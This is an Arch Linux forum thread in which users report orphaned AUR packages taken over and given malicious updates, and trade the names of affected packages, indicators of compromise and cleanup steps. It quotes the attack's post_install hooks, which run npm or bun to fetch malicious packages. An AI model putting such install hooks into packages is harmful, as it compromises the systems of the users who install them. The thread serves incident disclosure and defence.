multiple malicious AUR updates

darthvader · 2026-06-11 15:32:48

i just received multiple emails regarding packages i used to contribute to, with malicous updates, they all have this new .install file(or similar):

+post_install() {{
+  cd /tmp
+  npm install atomic-lockfile axios cosmiconfig uuid
+}}

packages: perl-alien-wxwidgets, premake-git, smenu, git-annex-standalone, panwriter, fatx, vbam-git, ipfs-desktop-bin

this is active and ongoing, they've been taken over by new accounts with random names and random emails.

Last edited by darthvader (Yesterday 12:36:02)

yochananmarqos · 2026-06-11 15:35:16

Yes, there has been quite a flood in the last hour or so. See the recent aur-general posts.

gromit · 2026-06-11 15:38:17

The Moderation team is aware and a few of the moderators are already cleaning things up!

xsmile · 2026-06-11 16:08:57

Noticed it as well. Indicators of compromise can be:
- a new systemd user service with a random name pointing to the hidden malicious binary
- a shell script at ~/.local/bin/sudo for stealing passwords
- tor network traffic

deadYokai · 2026-06-11 16:16:43

i have same with python-openai-harmony package

Mylloon · 2026-06-11 17:16:57

Got those too:

- https://aur.archlinux.org/packages/monochrome-git
- https://aur.archlinux.org/packages/monochrome
- https://aur.archlinux.org/packages/hear … ux-gui-bin
- https://aur.archlinux.org/packages/hear … i-appimage

gromit · 2026-06-11 17:24:24

We have a filter script to find those, see the example here: https://github.com/archlinux/contrib/pull/108

Specialist · Yesterday 08:21:04

Is there an "official" list of packages that required cleanup? Due to their Git-repo history being rewritten there is no independent way of verifying if any of ones own installed AUR packages was affected...

0BADC0DE · Yesterday 10:51:05

https://lists.archlinux.org/archives/li … 2JHYB7ZS4/

Please, either dismiss as fake news or let everyone know.

Lone_Wolf · Yesterday 11:06:23

Not fake news and that maillist is the right place.

https://aur.archlinux.org/ wrote:

Discussion
General discussion regarding the Arch User Repository (AUR) and Package Maintainer structure takes place on aur-general.

Moderator Note
merging with https://bbs.archlinux.org/viewtopic.php?id=313892

Last edited by Lone_Wolf (Yesterday 11:08:05)

juglans_regia · Yesterday 11:10:05

I have a few of those packages installed (like gpx-viewer and gdl from 2025-06-08). I'm struggling to figure out if they are malicious, especially since the git history seems to have been deleted?
Is there a way to know if my system is compromised, or should I just reinstall my system?

Edit: i don't even have npm installed. Is it possible that it was installed as a build dependency anyway and removed after?

Last edited by juglans_regia (Yesterday 11:11:19)

V1del · Yesterday 12:17:01

If you haven't updated/installed them recently they will not yet have been affected by this. Afaik npm itself wasn't actively touched by these changes, it was just getting used to download the malware via a post install hook. This should also further drive home that the AUR is unsupported and you are somewhat supposed to vet the diffs between PKGBUILDs

darthvader · Yesterday 12:34:23

now they've changed it to using bun

for the uninitiated, a quick glance doesn't show what's nefarious

+post_install() {{
+  cd /tmp
+  bun add figures debug js-digest
+}}

juglans_regia · Yesterday 12:35:24

I see, thanks.

How recent is recent? I have one installed on 29 March 2026.

Yes, PKGBUILDS should be checked... but it's difficult to follow when they do more that compiling and installing files sometimes. I definitely got too used to not checking carefully.

V1del · Yesterday 12:36:02

FWIW a post install trying to do anything other than a simple informational echo should make you pause regardless.

Afaik March 29 predates that, recent is in the last week

Last edited by V1del (Yesterday 12:37:01)

darthvader · Yesterday 12:44:01

since this is still active, im doing `sudo chmod -x /bin/npm /bin/bun` before using yay.

whoever is behind this, has clearly automated the whole takeover process.

LoNaAleim · Yesterday 13:00:40

Can't have nice things on the internet, sorry to the folks who have to clean up the mess. I'll buy you a drink if I ever happen to get the chance.

Do we have any way to establish time-frames during which individual AUR packages where compromised?

It appears that the malicious commits are being removed from the AUR, which makes sense to minimize the spread.
Is there a detailed enough log of pushes to the AUR or does anyone at least have an archived version of the repo before starting to remove the commits?
E.g. a hence unmodified copy of André Herbst's clone mentioned here: https://lists.archlinux.org/archives/li … 2JHYB7ZS4/

Last edited by LoNaAleim (Yesterday 13:01:44)

progandy · Yesterday 13:08:42

Is there a detailed enough log of pushes to the AUR or does anyone at least have an archived version of the repo before starting to remove the commits?

You can probably use the github mirror activity log. force pushes should mostly be the reverts.
https://github.com/archlinux/aur/activity

Here for example status for two different packages:

codeclimate (restored after ~30 minutes): https://github.com/archlinux/aur/activi … odeclimate
snapd-git (compromised as of this posting): https://github.com/archlinux/aur/activity?ref=snapd-git

Last edited by progandy (Yesterday 13:19:21)

bboozzoo · Yesterday 13:12:18

Noticed the same in https://aur.archlinux.org/packages/snapd-git which I orphaned years ago. Got adopted by a newly created account which immediately pushed some random bun crap.

offbeatwitch · Yesterday 13:18:40

I reported the malicious "atomic-lockfile" package as malware to npm and they replaced it with a security placeholder at roughly 12PM UTC. Seems the new malicious package "js-digest" is also currently unpublished:

% npm view js-digest
npm error code E404
npm error 404 Unpublished on 2026-06-12T11:53:23.722Z
npm error 404
npm error 404  'js-digest' is not in this registry.

but I'm not sure if this is also npm's doing. I can only assume the attacker will switch to another package shortly though, but at least there's one less piece of malware on npm for a short while...

progandy · Yesterday 13:24:10

Would it not help to block uploads for all accounts registered this month until the mess has been sorted out?

LoNaAleim · Yesterday 14:05:47

It's happening again, right now: https://github.com/archlinux/aur/activi … AAAAhE-Tuf

Someone is pushing https://www.npmjs.com/package/lockfile-js to a lot of packages. The npm package even still has `atomic-lockfile` in the README.

Last edited by LoNaAleim (Yesterday 14:06:06)

Sidekick · Yesterday 14:19:01

Wait how can this happen? Arch has a very good trusted user system - to the point where it has so far deterred me from getting involved as I do not have the time for that. How can some random accounts just push code changes *and* let those go live without any kind of review system in place?

Aside from that, and being more productive: Some sort of script needs to be created that checks if a user's system is affected - someone noted a "new users" and some files further up in the thread, but that isn't definitiive - and for that first there needs to be a way to figure out if a package is affected, then figure out which versions of that package are affected and then compare that against the installed packages. For detection, it seems like we would have to go over the git history of all AUR packages? Other people are noting that npm or something called bun are being used to install the actual malicious stuff, would that appear in the pacman logfile? Probably easier to grep over that.

Last edited by Sidekick (Yesterday 14:21:17)

LoNaAleim · Yesterday 14:26:02

Sidekick wrote:

Wait how can this happen? Arch has a very good trusted user system - to the point where it has so far deterred me from getting involved as I do not have the time for that. How can some random accounts just push code changes *and* let those go live without any kind of review system in place?

We are talking about the AUR. The fact that these packages are not vetted is pointed out in pretty much any conceivable place, including right at the top of the AURs own homepage.
https://aur.archlinux.org/

progandy · Yesterday 14:28:11

Sidekick wrote:

Wait how can this happen? Arch has a very good trusted user system - to the point where it has so far deterred me from getting involved as I do not have the time for that. How can some random accounts just push code changes *and* let those go live without any kind of review system in place?

Packages in the official repository are not affected, only a limited group of verified users (developers, trusted users and so on) can push there.
Someone is taking over orphaned AUR packages automatically and adding the malware. Orphaned means there is no maintainer for these packages and anyone with an AUR account can accept that maintainer role and submit updates.

Last edited by progandy (Yesterday 14:29:48)

Arch Linux

#1 2026-06-11 15:32:48

multiple malicious AUR updates

#2 2026-06-11 15:35:16

Re: multiple malicious AUR updates

#3 2026-06-11 15:38:17

Re: multiple malicious AUR updates

#4 2026-06-11 16:08:57

Re: multiple malicious AUR updates

#5 2026-06-11 16:16:43

Re: multiple malicious AUR updates

#6 2026-06-11 17:16:57

Re: multiple malicious AUR updates

#7 2026-06-11 17:24:24

Re: multiple malicious AUR updates

#8 Yesterday 08:21:04

Re: multiple malicious AUR updates

#9 Yesterday 10:51:05

Re: multiple malicious AUR updates

#10 Yesterday 11:06:23

Re: multiple malicious AUR updates

#11 Yesterday 11:10:05

Re: multiple malicious AUR updates

#12 Yesterday 12:17:01

Re: multiple malicious AUR updates

#13 Yesterday 12:34:23

Re: multiple malicious AUR updates

#14 Yesterday 12:35:24

Re: multiple malicious AUR updates

#15 Yesterday 12:36:02

Re: multiple malicious AUR updates

#16 Yesterday 12:44:01

Re: multiple malicious AUR updates

#17 Yesterday 13:00:40

Re: multiple malicious AUR updates

#18 Yesterday 13:08:42

Re: multiple malicious AUR updates

#19 Yesterday 13:12:18

Re: multiple malicious AUR updates

#20 Yesterday 13:18:40

Re: multiple malicious AUR updates

#21 Yesterday 13:24:10

Re: multiple malicious AUR updates

#22 Yesterday 14:05:47

Re: multiple malicious AUR updates

#23 Yesterday 14:19:01

Re: multiple malicious AUR updates

#24 Yesterday 14:26:02

Re: multiple malicious AUR updates

#25 Yesterday 14:28:11

Re: multiple malicious AUR updates

Board footer